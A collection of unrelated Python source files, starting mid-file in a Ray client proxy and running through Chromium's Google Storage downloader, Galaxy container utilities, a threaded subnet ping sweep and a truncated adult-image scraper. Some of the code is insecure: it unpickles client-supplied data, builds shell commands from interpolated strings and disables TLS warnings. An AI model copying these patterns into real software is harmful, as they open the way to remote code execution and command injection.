context=None) -> ray_client_pb2.PutResponse:
return self._call_inner_function(request, context, "PutObject")
def WaitObject(self, request, context=None) -> ray_client_pb2.WaitResponse:
return self._call_inner_function(request, context, "WaitObject")
def Schedule(self, task, context=None) -> ray_client_pb2.ClientTaskTicket:
return self._call_inner_function(task, context, "Schedule")
def ray_client_server_env_prep(job_config: JobConfig) -> JobConfig:
return job_config
def prepare_runtime_init_req(init_request: ray_client_pb2.DataRequest
) -> Tuple[ray_client_pb2.DataRequest, JobConfig]:
"""
Extract JobConfig and possibly mutate InitRequest before it is passed to
the specific RayClient Server.
"""
init_type = init_request.WhichOneof("type")
assert init_type == "init", ("Received initial message of type "
f"{init_type}, not 'init'.")
req = init_request.init
job_config = JobConfig()
if req.job_config:
job_config = pickle.loads(req.job_config)
new_job_config = ray_client_server_env_prep(job_config)
modified_init_req = ray_client_pb2.InitRequest(
job_config=pickle.dumps(new_job_config))
init_request.init.CopyFrom(modified_init_req)
return (init_request, new_job_config)
class DataServicerProxy(ray_client_pb2_grpc.RayletDataStreamerServicer):
def __init__(self, proxy_manager: ProxyManager):
self.num_clients = 0
self.clients_lock = Lock()
self.proxy_manager = proxy_manager
def modify_connection_info_resp(self,
init_resp: ray_client_pb2.DataResponse
) -> ray_client_pb2.DataResponse:
"""
Modify the `num_clients` returned the ConnectionInfoResponse because
individual SpecificServers only have **one** client.
"""
init_type = init_resp.WhichOneof("type")
if init_type != "connection_info":
return init_resp
modified_resp = ray_client_pb2.DataResponse()
modified_resp.CopyFrom(init_resp)
with self.clients_lock:
modified_resp.connection_info.num_clients = self.num_clients
return modified_resp
def Datapath(self, request_iterator, context):
client_id = _get_client_id_from_context(context)
if client_id == "":
return
# Create Placeholder *before* reading the first request.
server = self.proxy_manager.create_specific_server(client_id)
try:
with self.clients_lock:
self.num_clients += 1
logger.info(f"New data connection from client {client_id}: ")
init_req = next(request_iterator)
try:
modified_init_req, job_config = prepare_runtime_init_req(
init_req)
if not self.proxy_manager.start_specific_server(
client_id, job_config):
logger.error(
f"Server startup failed for client: {client_id}, "
f"using JobConfig: {job_config}!")
raise RuntimeError(
"Starting up Server Failed! Check "
"`ray_client_server_[port].err` on the cluster.")
channel = self.proxy_manager.get_channel(client_id)
if channel is None:
logger.error(f"Channel not found for {client_id}")
raise RuntimeError(
"Proxy failed to Connect to backend! Check "
"`ray_client_server.err` on the cluster.")
stub = ray_client_pb2_grpc.RayletDataStreamerStub(channel)
except Exception:
init_resp = ray_client_pb2.DataResponse(
init=ray_client_pb2.InitResponse(
ok=False, msg=traceback.format_exc()))
init_resp.req_id = init_req.req_id
yield init_resp
return None
new_iter = chain([modified_init_req], request_iterator)
resp_stream = stub.Datapath(
new_iter, metadata=[("client_id", client_id)])
for resp in resp_stream:
yield self.modify_connection_info_resp(resp)
except Exception:
logger.exception("Proxying Datapath failed!")
finally:
server.set_result(None)
with self.clients_lock:
logger.debug(f"Client detached: {client_id}")
self.num_clients -= 1
class LogstreamServicerProxy(ray_client_pb2_grpc.RayletLogStreamerServicer):
def __init__(self, proxy_manager: ProxyManager):
super().__init__()
self.proxy_manager = proxy_manager
def Logstream(self, request_iterator, context):
client_id = _get_client_id_from_context(context)
if client_id == "":
return
logger.debug(f"New logstream connection from client {client_id}: ")
channel = None
# We need to retry a few times because the LogClient *may* connect
# Before the DataClient has finished connecting.
for i in range(LOGSTREAM_RETRIES):
channel = self.proxy_manager.get_channel(client_id)
if channel is not None:
break
logger.warning(
f"Retrying Logstream connection. {i+1} attempts failed.")
time.sleep(LOGSTREAM_RETRY_INTERVAL_SEC)
if channel is None:
context.set_code(grpc.StatusCode.UNAVAILABLE)
return None
stub = ray_client_pb2_grpc.RayletLogStreamerStub(channel)
resp_stream = stub.Logstream(
request_iterator, metadata=[("client_id", client_id)])
try:
for resp in resp_stream:
yield resp
except Exception:
logger.exception("Proxying Logstream failed!")
def serve_proxier(connection_str: str,
redis_address: str,
*,
redis_password: Optional[str] = None,
session_dir: Optional[str] = None):
server = grpc.server(
futures.ThreadPoolExecutor(max_workers=CLIENT_SERVER_MAX_THREADS),
options=GRPC_OPTIONS)
proxy_manager = ProxyManager(
redis_address, session_dir=session_dir, redis_password=redis_password)
task_servicer = RayletServicerProxy(None, proxy_manager)
data_servicer = DataServicerProxy(proxy_manager)
logs_servicer = LogstreamServicerProxy(proxy_manager)
ray_client_pb2_grpc.add_RayletDriverServicer_to_server(
task_servicer, server)
ray_client_pb2_grpc.add_RayletDataStreamerServicer_to_server(
data_servicer, server)
ray_client_pb2_grpc.add_RayletLogStreamerServicer_to_server(
logs_servicer, server)
server.add_insecure_port(connection_str)
server.start()
return ClientServerHandle(
task_servicer=task_servicer,
data_servicer=data_servicer,
logs_servicer=logs_servicer,
grpc_server=server,
)
|
download_from_google_storage.py
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Download files from Google Storage based on SHA1 sums."""
import hashlib
import optparse
import os
import Queue
import re
import stat
import sys
import threading
import time
import subprocess2
GSUTIL_DEFAULT_PATH = os.path.join(
os.path.dirname(os.path.abspath(__file__)), 'gsutil.py')
# Maps sys.platform to what we actually want to call them.
PLATFORM_MAPPING = {
'cygwin': 'win',
'darwin': 'mac',
'linux2': 'linux',
'win32': 'win',
}
class FileNotFoundError(IOError):
pass
class InvalidFileError(IOError):
pass
class InvalidPlatformError(Exception):
pass
def GetNormalizedPlatform():
"""Returns the result of sys.platform accounting for cygwin.
Under cygwin, this will always return "win32" like the native Python."""
if sys.platform == 'cygwin':
return 'win32'
return sys.platform
# Common utilities
class Gsutil(object):
"""Call gsutil with some predefined settings. This is a convenience object,
and is also immutable."""
def __init__(self, path, boto_path, timeout=None, version='4.7'):
if not os.path.exists(path):
raise FileNotFoundError('GSUtil not found in %s' % path)
self.path = path
self.timeout = timeout
self.boto_path = boto_path
self.version = version
def get_sub_env(self):
env = os.environ.copy()
if self.boto_path == os.devnull:
env['AWS_CREDENTIAL_FILE'] = ''
env['BOTO_CONFIG'] = ''
elif self.boto_path:
env['AWS_CREDENTIAL_FILE'] = self.boto_path
env['BOTO_CONFIG'] = self.boto_path
else:
custompath = env.get('AWS_CREDENTIAL_FILE', '~/.boto') + '.depot_tools'
custompath = os.path.expanduser(custompath)
if os.path.exists(custompath):
env['AWS_CREDENTIAL_FILE'] = custompath
return env
def call(self, *args):
cmd = [sys.executable, self.path, '--force-version', self.version]
cmd.extend(args)
return subprocess2.call(cmd, env=self.get_sub_env(), timeout=self.timeout)
def check_call(self, *args):
cmd = [sys.executable, self.path, '--force-version', self.version]
cmd.extend(args)
((out, err), code) = subprocess2.communicate(
cmd,
stdout=subprocess2.PIPE,
stderr=subprocess2.PIPE,
env=self.get_sub_env(),
timeout=self.timeout)
# Parse output.
status_code_match = re.search('status=([0-9]+)', err)
if status_code_match:
return (int(status_code_match.group(1)), out, err)
if ('You are attempting to access protected data with '
'no configured credentials.' in err):
return (403, out, err)
if 'No such object' in err:
return (404, out, err)
return (code, out, err)
def check_platform(target):
"""Checks if any parent directory of target matches (win|mac|linux)."""
assert os.path.isabs(target)
root, target_name = os.path.split(target)
if not target_name:
return None
if target_name in ('linux', 'mac', 'win'):
return target_name
return check_platform(root)
def get_sha1(filename):
sha1 = hashlib.sha1()
with open(filename, 'rb') as f:
while True:
# Read in 1mb chunks, so it doesn't all have to be loaded into memory.
chunk = f.read(1024*1024)
if not chunk:
break
sha1.update(chunk)
return sha1.hexdigest()
# Download-specific code starts here
def enumerate_work_queue(input_filename, work_queue, directory,
recursive, ignore_errors, output, sha1_file,
auto_platform):
if sha1_file:
if not os.path.exists(input_filename):
if not ignore_errors:
raise FileNotFoundError('%s not found.' % input_filename)
print >> sys.stderr, '%s not found.' % input_filename
with open(input_filename, 'rb') as f:
sha1_match = re.match('^([A-Za-z0-9]{40})$', f.read(1024).rstrip())
if sha1_match:
work_queue.put((sha1_match.groups(1)[0], output))
return 1
if not ignore_errors:
raise InvalidFileError('No sha1 sum found in %s.' % input_filename)
print >> sys.stderr, 'No sha1 sum found in %s.' % input_filename
return 0
if not directory:
work_queue.put((input_filename, output))
return 1
work_queue_size = 0
for root, dirs, files in os.walk(input_filename):
if not recursive:
for item in dirs[:]:
dirs.remove(item)
else:
for exclude in ['.svn', '.git']:
if exclude in dirs:
dirs.remove(exclude)
for filename in files:
full_path = os.path.join(root, filename)
if full_path.endswith('.sha1'):
if auto_platform:
# Skip if the platform does not match.
target_platform = check_platform(os.path.abspath(full_path))
if not target_platform:
err = ('--auto_platform passed in but no platform name found in '
'the path of %s' % full_path)
if not ignore_errors:
raise InvalidFileError(err)
print >> sys.stderr, err
continue
current_platform = PLATFORM_MAPPING[sys.platform]
if current_platform != target_platform:
continue
with open(full_path, 'rb') as f:
sha1_match = re.match('^([A-Za-z0-9]{40})$', f.read(1024).rstrip())
if sha1_match:
work_queue.put(
(sha1_match.groups(1)[0], full_path.replace('.sha1', '')))
work_queue_size += 1
else:
if not ignore_errors:
raise InvalidFileError('No sha1 sum found in %s.' % filename)
print >> sys.stderr, 'No sha1 sum found in %s.' % filename
return work_queue_size
def _downloader_worker_thread(thread_num, q, force, base_url,
gsutil, out_q, ret_codes, verbose):
while True:
input_sha1_sum, output_filename = q.get()
if input_sha1_sum is None:
return
if os.path.exists(output_filename) and not force:
if get_sha1(output_filename) == input_sha1_sum:
if verbose:
out_q.put(
'%d> File %s exists and SHA1 matches. Skipping.' % (
thread_num, output_filename))
continue
# Check if file exists.
file_url = '%s/%s' % (base_url, input_sha1_sum)
if gsutil.check_call('ls', file_url)[0] != 0:
out_q.put('%d> File %s for %s does not exist, skipping.' % (
thread_num, file_url, output_filename))
ret_codes.put((1, 'File %s for %s does not exist.' % (
file_url, output_filename)))
continue
# Fetch the file.
out_q.put('%d> Downloading %s...' % (thread_num, output_filename))
try:
os.remove(output_filename) # Delete the file if it exists already.
except OSError:
if os.path.exists(output_filename):
out_q.put('%d> Warning: deleting %s failed.' % (
thread_num, output_filename))
code, _, err = gsutil.check_call('cp', file_url, output_filename)
if code != 0:
out_q.put('%d> %s' % (thread_num, err))
ret_codes.put((code, err))
# Set executable bit.
if sys.platform == 'cygwin':
# Under cygwin, mark all files as executable. The executable flag in
# Google Storage will not be set when uploading from Windows, so if
# this script is running under cygwin and we're downloading an
# executable, it will be unrunnable from inside cygwin without this.
st = os.stat(output_filename)
os.chmod(output_filename, st.st_mode | stat.S_IEXEC)
elif sys.platform != 'win32':
# On non-Windows platforms, key off of the custom header
# "x-goog-meta-executable".
code, out, _ = gsutil.check_call('stat', file_url)
if code != 0:
out_q.put('%d> %s' % (thread_num, err))
ret_codes.put((code, err))
elif re.search(r'executable:\s*1', out):
st = os.stat(output_filename)
os.chmod(output_filename, st.st_mode | stat.S_IEXEC)
def printer_worker(output_queue):
while True:
line = output_queue.get()
# Its plausible we want to print empty lines.
if line is None:
break
print line
def download_from_google_storage(
input_filename, base_url, gsutil, num_threads, directory, recursive,
force, output, ignore_errors, sha1_file, verbose, auto_platform):
# Start up all the worker threads.
all_threads = []
download_start = time.time()
stdout_queue = Queue.Queue()
work_queue = Queue.Queue()
ret_codes = Queue.Queue()
ret_codes.put((0, None))
for thread_num in range(num_threads):
t = threading.Thread(
target=_downloader_worker_thread,
args=[thread_num, work_queue, force, base_url,
gsutil, stdout_queue, ret_codes, verbose])
t.daemon = True
t.start()
all_threads.append(t)
printer_thread = threading.Thread(target=printer_worker, args=[stdout_queue])
printer_thread.daemon = True
printer_thread.start()
# Enumerate our work queue.
work_queue_size = enumerate_work_queue(
input_filename, work_queue, directory, recursive,
ignore_errors, output, sha1_file, auto_platform)
for _ in all_threads:
work_queue.put((None, None)) # Used to tell worker threads to stop.
# Wait for all downloads to finish.
for t in all_threads:
t.join()
stdout_queue.put(None)
printer_thread.join()
# See if we ran into any errors.
max_ret_code = 0
for ret_code, message in ret_codes.queue:
max_ret_code = max(ret_code, max_ret_code)
if message:
print >> sys.stderr, message
if verbose and not max_ret_code:
print 'Success!'
if verbose:
print 'Downloading %d files took %1f second(s)' % (
work_queue_size, time.time() - download_start)
return max_ret_code
def main(args):
usage = ('usage: %prog [options] target\n'
'Target must be:\n'
' (default) a sha1 sum ([A-Za-z0-9]{40}).\n'
' (-s or --sha1_file) a .sha1 file, containing a sha1 sum on '
'the first line.\n'
' (-d or --directory) A directory to scan for .sha1 files.')
parser = optparse.OptionParser(usage)
parser.add_option('-o', '--output',
help='Specify the output file name. Defaults to: '
'(a) Given a SHA1 hash, the name is the SHA1 hash. '
'(b) Given a .sha1 file or directory, the name will '
'match (.*).sha1.')
parser.add_option('-b', '--bucket',
help='Google Storage bucket to fetch from.')
parser.add_option('-e', '--boto',
help='Specify a custom boto file.')
parser.add_option('-c', '--no_resume', action='store_true',
help='Resume download if file is partially downloaded.')
parser.add_option('-f', '--force', action='store_true',
help='Force download even if local file exists.')
parser.add_option('-i', '--ignore_errors', action='store_true',
help='Don\'t throw error if we find an invalid .sha1 file.')
parser.add_option('-r', '--recursive', action='store_true',
help='Scan folders recursively for .sha1 files. '
'Must be used with -d/--directory')
parser.add_option('-t', '--num_threads', default=1, type='int',
help='Number of downloader threads to run.')
parser.add_option('-d', '--directory', action='store_true',
help='The target is a directory. '
'Cannot be used with -s/--sha1_file.')
parser.add_option('-s', '--sha1_file', action='store_true',
help='The target is a file containing a sha1 sum. '
'Cannot be used with -d/--directory.')
parser.add_option('-g', '--config', action='store_true',
help='Alias for "gsutil config". Run this if you want '
'to initialize your saved Google Storage '
'credentials. This will create a read-only '
'credentials file in ~/.boto.depot_tools.')
parser.add_option('-n', '--no_auth', action='store_true',
help='Skip auth checking. Use if it\'s known that the '
'target bucket is a public bucket.')
parser.add_option('-p', '--platform',
help='A regular expression that is compared against '
'Python\'s sys.platform. If this option is specified, '
'the download will happen only if there is a match.')
parser.add_option('-a', '--auto_platform',
action='store_true',
help='Detects if any parent folder of the target matches '
'(linux|mac|win). If so, the script will only '
'process files that are in the paths that '
'that matches the current platform.')
parser.add_option('-v', '--verbose', action='store_true',
help='Output extra diagnostic and progress information.')
(options, args) = parser.parse_args()
# Make sure we should run at all based on platform matching.
if options.platform:
if options.auto_platform:
parser.error('--platform can not be specified with --auto_platform')
if not re.match(options.platform, GetNormalizedPlatform()):
if options.verbose:
print('The current platform doesn\'t match "%s", skipping.' %
options.platform)
return 0
# Set the boto file to /dev/null if we don't need auth.
if options.no_auth:
if (set(('http_proxy', 'https_proxy')).intersection(
env.lower() for env in os.environ) and
'NO_AUTH_BOTO_CONFIG' not in os.environ):
print >> sys.stderr, ('NOTICE: You have PROXY values set in your '
'environment, but gsutil in depot_tools does not '
'(yet) obey them.')
print >> sys.stderr, ('Also, --no_auth prevents the normal BOTO_CONFIG '
'environment variable from being used.')
print >> sys.stderr, ('To use a proxy in this situation, please supply '
'those settings in a .boto file pointed to by '
'the NO_AUTH_BOTO_CONFIG environment var.')
options.boto = os.environ.get('NO_AUTH_BOTO_CONFIG', os.devnull)
# Make sure gsutil exists where we expect it to.
if os.path.exists(GSUTIL_DEFAULT_PATH):
gsutil = Gsutil(GSUTIL_DEFAULT_PATH,
boto_path=options.boto)
else:
parser.error('gsutil not found in %s, bad depot_tools checkout?' %
GSUTIL_DEFAULT_PATH)
# Passing in -g/--config will run our copy of GSUtil, then quit.
if options.config:
return gsutil.call('config', '-r', '-o',
os.path.expanduser('~/.boto.depot_tools'))
if not args:
parser.error('Missing target.')
if len(args) > 1:
parser.error('Too many targets.')
if not options.bucket:
parser.error('Missing bucket. Specify bucket with --bucket.')
if options.sha1_file and options.directory:
parser.error('Both --directory and --sha1_file are specified, '
'can only specify one.')
if options.recursive and not options.directory:
parser.error('--recursive specified but --directory not specified.')
if options.output and options.directory:
parser.error('--directory is specified, so --output has no effect.')
if (not (options.sha1_file or options.directory)
and options.auto_platform):
parser.error('--auto_platform must be specified with either '
'--sha1_file or --directory')
input_filename = args[0]
# Set output filename if not specified.
if not options.output and not options.directory:
if not options.sha1_file:
# Target is a sha1 sum, so output filename would also be the sha1 sum.
options.output = input_filename
elif options.sha1_file:
# Target is a .sha1 file.
if not input_filename.endswith('.sha1'):
parser.error('--sha1_file is specified, but the input filename '
'does not end with .sha1, and no --output is specified. '
'Either make sure the input filename has a .sha1 '
'extension, or specify --output.')
options.output = input_filename[:-5]
else:
parser.error('Unreachable state.')
# Check if output file already exists.
if not options.directory and not options.force and not options.no_resume:
if os.path.exists(options.output):
parser.error('Output file %s exists and --no_resume is specified.'
% options.output)
base_url = 'gs://%s' % options.bucket
return download_from_google_storage(
input_filename, base_url, gsutil, options.num_threads, options.directory,
options.recursive, options.force, options.output, options.ignore_errors,
options.sha1_file, options.verbose, options.auto_platform)
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
playerio.py
|
import threading
import urllib3
urllib3.disable_warnings()
http = urllib3.PoolManager()
def last_sender(player):
content = player.text_deque[0]
res = http.request( content[0], content[1], body=content[2], headers=content[3] )
check(res)
player.text_lock.acquire()
player.text_deque.popleft()
player.text_lock.release()
if len( player.text_deque ) > 0:
last_sender( player )
# Main function to send message to player
def send_to_queue( player, content ):
if len(player.text_deque) == 0:
player.text_deque.append( content )
t = threading.Thread( target = last_sender, args=(player,) )
t.start()
else:
player.text_lock.acquire()
player.text_deque.append( content )
player.text_lock.release()
return True
# check the response status
def check(res):
if res.status == 200:
return True
else:
print( res.status )
print( 'res = ' + str( res.data ) )
return False
|
waterfallRepo.py
|
from queue import Queue
from threading import Thread
from commands.download.downloadCommandParams import DownloadCommandParams
from commands.download.waterfallDownloadCommand import WaterfallDownloadCommand
from workers.downloadWorker import DownloadWorker
from domain.interfaces.downloadable import Downloadable
class WaterfallRepo(Downloadable):
def __init__(self, working_dir, modules):
self.__working_dir = working_dir
self.__waterfall_commands = Queue()
self.__modules = modules
def register_command(self, observation, start_date, end_date):
cmd_parameters = DownloadCommandParams(
self.__working_dir, self.__create_dir_name('waterfall', start_date, end_date), self.__modules)
waterfallDownloadCommand = WaterfallDownloadCommand(
cmd_parameters, observation)
self.__waterfall_commands.put(waterfallDownloadCommand)
def create_worker(self):
return self.__create_thread(self.__waterfall_commands)
def __create_thread(self, queue):
worker = DownloadWorker(queue)
thread = Thread(target=worker.execute)
thread.daemon = True
thread.start()
return thread
def __create_dir_name(self, target, start_date, end_date):
return target + '__' + start_date.strftime('%m-%d-%YT%H-%M-%S') + '__' + end_date.strftime('%m-%d-%YT%H-%M-%S')
|
util.py
|
"""Utilities for working with mulled abstractions outside the mulled package."""
from __future__ import print_function
import collections
import hashlib
import logging
import re
import sys
import tarfile
import threading
import time
from io import BytesIO
import packaging.version
import requests
log = logging.getLogger(__name__)
QUAY_REPOSITORY_API_ENDPOINT = 'https://quay.io/api/v1/repository'
BUILD_NUMBER_REGEX = re.compile(r'\d+$')
PARSED_TAG = collections.namedtuple('ParsedTag', 'tag version build_string build_number')
def create_repository(namespace, repo_name, oauth_token):
assert oauth_token
headers = {'Authorization': 'Bearer %s' % oauth_token}
data = {
"repository": repo_name,
"namespace": namespace,
"description": "",
"visibility": "public",
}
requests.post("https://quay.io/api/v1/repository", json=data, headers=headers)
def quay_versions(namespace, pkg_name):
"""Get all version tags for a Docker image stored on quay.io for supplied package name."""
data = quay_repository(namespace, pkg_name)
if 'error_type' in data and data['error_type'] == "invalid_token":
return []
if 'tags' not in data:
raise Exception("Unexpected response from quay.io - no tags description found [%s]" % data)
return [tag for tag in data['tags'].keys() if tag != 'latest']
def quay_repository(namespace, pkg_name):
assert namespace is not None
assert pkg_name is not None
url = 'https://quay.io/api/v1/repository/%s/%s' % (namespace, pkg_name)
response = requests.get(url, timeout=None)
data = response.json()
return data
def _namespace_has_repo_name(namespace, repo_name, resolution_cache):
"""
Get all quay containers in the biocontainers repo
"""
cache_key = "galaxy.tool_util.deps.container_resolvers.mulled.util:namespace_repo_names"
if resolution_cache is not None and cache_key in resolution_cache:
repo_names = resolution_cache.get(cache_key)
else:
repos_parameters = {'public': 'true', 'namespace': namespace}
repos_headers = {'Accept-encoding': 'gzip', 'Accept': 'application/json'}
repos_response = requests.get(
QUAY_REPOSITORY_API_ENDPOINT, headers=repos_headers, params=repos_parameters, timeout=None)
repos = repos_response.json()['repositories']
repo_names = [r["name"] for r in repos]
if resolution_cache is not None:
resolution_cache[cache_key] = repo_names
return repo_name in repo_names
def mulled_tags_for(namespace, image, tag_prefix=None, resolution_cache=None):
"""Fetch remote tags available for supplied image name.
The result will be sorted so newest tags are first.
"""
if resolution_cache is not None:
# Following check is pretty expensive against biocontainers... don't even bother doing it
# if can't cache the response.
if not _namespace_has_repo_name(namespace, image, resolution_cache):
log.debug("skipping mulled_tags_for [%s] no repository" % image)
return []
cache_key = "galaxy.tool_util.deps.container_resolvers.mulled.util:tag_cache"
if resolution_cache is not None:
if cache_key not in resolution_cache:
resolution_cache[cache_key] = collections.defaultdict(dict)
tag_cache = resolution_cache.get(cache_key)
else:
tag_cache = collections.defaultdict(dict)
tags_cached = False
if namespace in tag_cache:
if image in tag_cache[namespace]:
tags = tag_cache[namespace][image]
tags_cached = True
if not tags_cached:
tags = quay_versions(namespace, image)
tag_cache[namespace][image] = tags
if tag_prefix is not None:
tags = [t for t in tags if t.startswith(tag_prefix)]
tags = version_sorted(tags)
return tags
def split_tag(tag):
"""Split mulled image tag into conda version and conda build."""
return tag.rsplit('--', 1)
def parse_tag(tag):
"""Decompose tag of mulled images into version, build string and build number."""
version = tag
build_string = "-1"
if '--' in tag:
version, build_string = tag.rsplit('--', 1)
elif '-' in tag:
# Should be mulled multi-container image tag
version, build_string = tag.rsplit('-', 1)
build_number = int(BUILD_NUMBER_REGEX.search(tag).group(0))
return PARSED_TAG(tag=tag,
version=packaging.version.parse(version),
build_string=packaging.version.parse(build_string),
build_number=build_number)
def version_sorted(elements):
"""Sort iterable based on loose description of "version" from newest to oldest."""
elements = (parse_tag(tag) for tag in elements)
elements = sorted(elements, key=lambda tag: tag.build_string, reverse=True)
elements = sorted(elements, key=lambda tag: tag.build_number, reverse=True)
elements = sorted(elements, key=lambda tag: tag.version)
return [e.tag for e in elements]
Target = collections.namedtuple("Target", ["package_name", "version", "build", "package"])
def build_target(package_name, version=None, build=None, tag=None):
"""Use supplied arguments to build a :class:`Target` object."""
if tag is not None:
assert version is None
assert build is None
version, build = split_tag(tag)
return Target(package_name, version, build, package_name)
def conda_build_target_str(target):
rval = target.package_name
if target.version:
rval += "=%s" % target.version
if target.build:
rval += "=%s" % target.build
return rval
def _simple_image_name(targets, image_build=None):
target = targets[0]
suffix = ""
if target.version is not None:
if image_build is not None:
print("WARNING: Hard-coding image build instead of using Conda build - this is not recommended.")
suffix = image_build
else:
suffix += ":%s" % target.version
build = target.build
if build is not None:
suffix += "--%s" % build
return "%s%s" % (target.package_name, suffix)
def v1_image_name(targets, image_build=None, name_override=None):
"""Generate mulled hash version 1 container identifier for supplied arguments.
If a single target is specified, simply use the supplied name and version as
the repository name and tag respectively. If multiple targets are supplied,
hash the package names and versions together as the repository name. For mulled
version 1 containers the image build is the repository tag (if supplied).
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v1_image_name(single_targets)
'samtools:1.3.1'
>>> multi_targets = [build_target("samtools", version="1.3.1"), build_target("bwa", version="0.7.13")]
>>> v1_image_name(multi_targets)
'mulled-v1-b06ecbd9141f0dbbc0c287375fc0813adfcbdfbd'
>>> multi_targets_on_versionless = [build_target("samtools", version="1.3.1"), build_target("bwa")]
>>> v1_image_name(multi_targets_on_versionless)
'mulled-v1-bda945976caa5734347fbf7f35066d9f58519e0c'
>>> multi_targets_versionless = [build_target("samtools"), build_target("bwa")]
>>> v1_image_name(multi_targets_versionless)
'mulled-v1-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40'
"""
if name_override is not None:
print("WARNING: Overriding mulled image name, auto-detection of 'mulled' package attributes will fail to detect result.")
return name_override
targets = list(targets)
if len(targets) == 1:
return _simple_image_name(targets, image_build=image_build)
else:
targets_order = sorted(targets, key=lambda t: t.package_name)
requirements_buffer = "\n".join(map(conda_build_target_str, targets_order))
m = hashlib.sha1()
m.update(requirements_buffer.encode())
suffix = "" if not image_build else ":%s" % image_build
return "mulled-v1-%s%s" % (m.hexdigest(), suffix)
def v2_image_name(targets, image_build=None, name_override=None):
"""Generate mulled hash version 2 container identifier for supplied arguments.
If a single target is specified, simply use the supplied name and version as
the repository name and tag respectively. If multiple targets are supplied,
hash the package names as the repository name and hash the package versions (if set)
as the tag.
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v2_image_name(single_targets)
'samtools:1.3.1'
>>> multi_targets = [build_target("samtools", version="1.3.1"), build_target("bwa", version="0.7.13")]
>>> v2_image_name(multi_targets)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40:4d0535c94ef45be8459f429561f0894c3fe0ebcf'
>>> multi_targets_on_versionless = [build_target("samtools", version="1.3.1"), build_target("bwa")]
>>> v2_image_name(multi_targets_on_versionless)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40:b0c847e4fb89c343b04036e33b2daa19c4152cf5'
>>> multi_targets_versionless = [build_target("samtools"), build_target("bwa")]
>>> v2_image_name(multi_targets_versionless)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40'
"""
if name_override is not None:
print("WARNING: Overriding mulled image name, auto-detection of 'mulled' package attributes will fail to detect result.")
return name_override
targets = list(targets)
if len(targets) == 1:
return _simple_image_name(targets, image_build=image_build)
else:
targets_order = sorted(targets, key=lambda t: t.package_name)
package_name_buffer = "\n".join(map(lambda t: t.package_name, targets_order))
package_hash = hashlib.sha1()
package_hash.update(package_name_buffer.encode())
versions = map(lambda t: t.version, targets_order)
if any(versions):
# Only hash versions if at least one package has versions...
version_name_buffer = "\n".join(map(lambda t: t.version or "null", targets_order))
version_hash = hashlib.sha1()
version_hash.update(version_name_buffer.encode())
version_hash_str = version_hash.hexdigest()
else:
version_hash_str = ""
if not image_build:
build_suffix = ""
elif version_hash_str:
# tagged verson is <version_hash>-<build>
build_suffix = "-%s" % image_build
else:
# tagged version is simply the build
build_suffix = image_build
suffix = ""
if version_hash_str or build_suffix:
suffix = ":%s%s" % (version_hash_str, build_suffix)
return "mulled-v2-%s%s" % (package_hash.hexdigest(), suffix)
def get_file_from_recipe_url(url):
"""Downloads file at url and returns tarball"""
r = requests.get(url)
return tarfile.open(mode="r:bz2", fileobj=BytesIO(r.content))
def split_container_name(name):
"""
Takes a container name (e.g. samtools:1.7--1) and returns a list (e.g. ['samtools', '1.7', '1'])
>>> split_container_name('samtools:1.7--1')
['samtools', '1.7', '1']
"""
return name.replace('--', ':').split(':')
class PrintProgress(object):
def __init__(self):
self.thread = threading.Thread(target=self.progress)
self.stop = False
def progress(self):
while not self.stop:
print(".", end="")
sys.stdout.flush()
time.sleep(60)
print("")
def __enter__(self):
self.thread.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop = True
self.thread.join()
image_name = v1_image_name # deprecated
__all__ = (
"build_target",
"conda_build_target_str",
"image_name",
"mulled_tags_for",
"quay_versions",
"split_container_name",
"split_tag",
"Target",
"v1_image_name",
"v2_image_name",
"version_sorted",
)
|
mtping2.py
|
import threading
import subprocess
class Ping:
def __init__(self, host):
self.host = host
def __call__(self):
result = subprocess.run(
'ping -c2 %s &> /dev/null' % self.host,
shell=True
)
if result.returncode == 0:
print('%s:up' % self.host)
else:
print('%s:down' % self.host)
if __name__ == '__main__':
ips = ('172.40.63.%s' % i for i in range(1, 255))
for ip in ips:
t = threading.Thread(target=Ping(ip))
t.start() # target()
|
snippet.py
|
#!/usr/bin/env python3
from threading import Thread
from urllib.parse import unquote
from pathlib import Path
from queue import Queue
import requests
import os.path
import sys
import re
INDEX_PAGE = 'http://rule34.paheal.net/post/list/%s/%d'
RE_IMG_URL = r'href=\"(.*)\"\>Image Only'
RE_TOTAL_PAGES = r'\/(\d+)\"\>Last\<\/a\>'
RE_BAD_FILENAME = r'[^\w\s\-\.\~\!\@\#\$\%\^\(\)\+\=\']'
DOWNLOAD_THREAD = 10
def fetch_total_pages(kw):
resp = requests.get(INDEX_PAGE % (kw, 1))
match = re.search(RE_TOTAL_PAGES, resp.text)
if match is None:
# No <a>Last</a> tag if only 1 page.
return 1
return int(match.group(1))
def fetch_urls(kw, page_from, page_to):
for i in range(page_from, page_to + 1):
resp = requests.get(INDEX_PAGE % (kw, i))
urls = re.findall(RE_IMG_URL, resp.text)
print('%s images are found in page %s.' % (len(urls), i))
for url in urls:
yield url
def download(queue, path, tid):
while True:
url = queue.get()
if url is None:
break
fname = unquote(url).split('/')[-1]
fname = re.sub(RE_BAD_FILENAME, ' ', fname).strip()
save_to = path / fname
if save_to.exists():
continue
print('#%02d Downloading %s...' % (tid, fname))
resp = requests.get(url)
with save_to.open('wb') as f:
f.write(resp.content)
queue.task_done()
print('#%02d exited.' % tid)
def main():
if not 2 <= len(sys.argv) <= 3:
print('Download all images from rule34.paheal.net, ignore existing '
'files.\n')
print('Usage: %s <keyword> [threads-num]' % sys.argv[0])
sys.exit(1)
kw = sys.argv[1]
if len(sys.argv) >= 3:
thread_num = int(sys.argv[2])
else:
thread_num = DOWNLOAD_THREAD
path = Path(kw)
if not path.exists():
path.mkdir()
elif not path.is_dir():
print('Cannot wirte to %s, file exists.' % path)
print('Fetching the number of pages...')
pages = fetch_total_pages(kw)
print('%s page(s) in total.' % pages)
queue = Queue(thread_num * 20)
threads = []
for i in range(thread_num):
t = Thread(target=download, args=(queue, path, i))
t.start()
threads.append(t)
print('%s threads are ready.' % len(threads))
